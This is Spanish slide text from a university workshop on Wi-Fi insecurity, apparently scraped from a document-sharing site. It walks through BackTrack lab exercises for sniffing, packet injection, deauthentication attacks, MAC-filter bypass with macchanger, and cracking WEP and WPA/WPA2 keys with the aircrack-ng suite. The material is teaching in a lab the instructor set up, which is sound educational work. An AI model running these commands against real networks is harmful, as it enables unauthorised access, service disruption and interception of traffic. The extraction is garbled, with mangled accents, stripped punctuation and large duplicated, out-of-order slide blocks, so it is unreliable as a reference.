bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 794
Amenaza
bull Causa potencial de un incidente no deseado locual podriacutea resultar en un dantildeo a un sistema u
organizacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 894
Amenazas
Password cracking
Man in the middle
Exploits
Denegacioacuten de servicio
Escalamiento de privilegios
Hacking de Centrales Telefoacutenicas
Keylogging Port scanning
Puertos vulnerables abiertos
Servicios de log inexistentes o que no son revisados
Desactualizacioacuten
Backups inexistentes
Uacuteltimos parches no instalados
Violacioacuten de la privacidad de los empleados
Destruccioacuten de equipamiento
Desastres naturales
Usuarios internos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994
Maacutes Amenazas
Captura de PC desde el exteriorViolacioacuten de contrasentildeas
Interrupcioacuten de los servicios
VirusMails anoacutenimos con agresiones
Incumplimiento de leyes y regulaciones
Robo o extraviacuteo de notebooks palms
Robo de informacioacuten
Destruccioacuten de soportes documentales
Acceso clandestino a redes
Intercepcioacuten de comunicaciones voz ywireless
Programas ldquobomba troyanosrdquo
Acceso indebido a documentos impresos
Agujeros de seguridad de redes conectadas
Falsificacioacuten de informacioacuten paraterceros
Indisponibilidad de informacioacuten clave
Spamming
Ingenieriacute a social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094
Vulnerabilidad
bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194
Vulnerabilidad
bull httpwwwsecurityfocuscom
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294
Analogiacutea de Seguridad
Acepto el riesgo
Minimizo el riesgo
Transfiero el riesgo
Amenaza
Vulnerabilidad
Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394
Conexioacuten a Medios Alaacutembricos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494
Conexioacuten a Redes inalaacutembricas
bull WiFi (80211x)bull 80211abull 80211bbull
80211gbull 80211n
bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594
ClapgnagmlEncripcioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694
Encripcioacuten
bull Privacidadbull Autenticacioacuten
bull Integridad
bull No repudio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794
Encripcioacuten
bull Encripcioacuten Simeacutetrica
bull Encripcioacuten Asimeacutetrica
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
